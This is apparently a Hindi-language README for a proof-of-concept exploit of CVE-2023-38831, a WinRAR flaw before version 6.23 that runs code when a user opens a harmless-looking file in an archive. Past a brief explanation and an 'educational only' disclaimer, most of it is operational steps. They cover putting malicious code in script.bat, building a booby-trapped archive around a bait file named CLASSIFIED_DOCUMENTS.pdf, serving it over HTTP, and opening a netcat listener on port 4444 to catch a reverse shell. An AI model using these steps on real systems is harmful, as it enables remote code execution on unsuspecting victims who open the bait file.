
⚠️ केवल शैक्षिक और अधिकृत सुरक्षा अनुसंधान उद्देश्यों के लिए
मूल PoC लेखक b1tg और Group-IB Threat Intelligence के बहुत आभारी हैं
RARLabs WinRAR 6.23 से पहले के संस्करण में हमलावरों को मनमाना कोड निष्पादित करने की अनुमति देता है जब कोई उपयोगकर्ता ZIP संग्रह में किसी हानिरहित फ़ाइल को देखने का प्रयास करता है।

समस्या इसलिए उत्पन्न होती है क्योंकि एक ZIP संग्रह में एक हानिरहित फ़ाइल (जैसे एक सामान्य .JPG फ़ाइल) के साथ-साथ उसी नाम का एक फ़ोल्डर भी शामिल हो सकता है, और केवल हानिरहित फ़ाइल तक पहुँचने के प्रयास के दौरान फ़ोल्डर की सामग्री (जिसमें निष्पादन योग्य सामग्री शामिल हो सकती है) संसाधित हो जाती है। अप्रैल से अगस्त 2023 के बीच इसका वास्तविक दुनिया में शोषण किया गया।

सबसे पहले, script.bat फ़ाइल को अपने खतरनाक निष्पादन कोड के साथ संशोधित करें
चारा फ़ाइल डालें, यह एक छवि (.png, jpg) या दस्तावेज़ (.pdf) होने की अनुशंसा की जाती है
एक्सप्लॉइट फ़ाइल उत्पन्न करने के लिए कमांड चलाएँ
python cve-2023-38831-exp-gen.py CLASSIFIED_DOCUMENTS.pdf script.bat poc.rar
उदाहरण के लिए, python http.server का उपयोग करके एक्सप्लॉइट फ़ाइल को लक्ष्य मशीन पर भेजें:
python -m http.server
अपने हमलावर मशीन पर लिसनर सेट करें:
nc -nlvp 4444
WinRAR 6.23 से पहले के संस्करण के साथ एक्सप्लॉइट फ़ाइल डाउनलोड करें और खोलें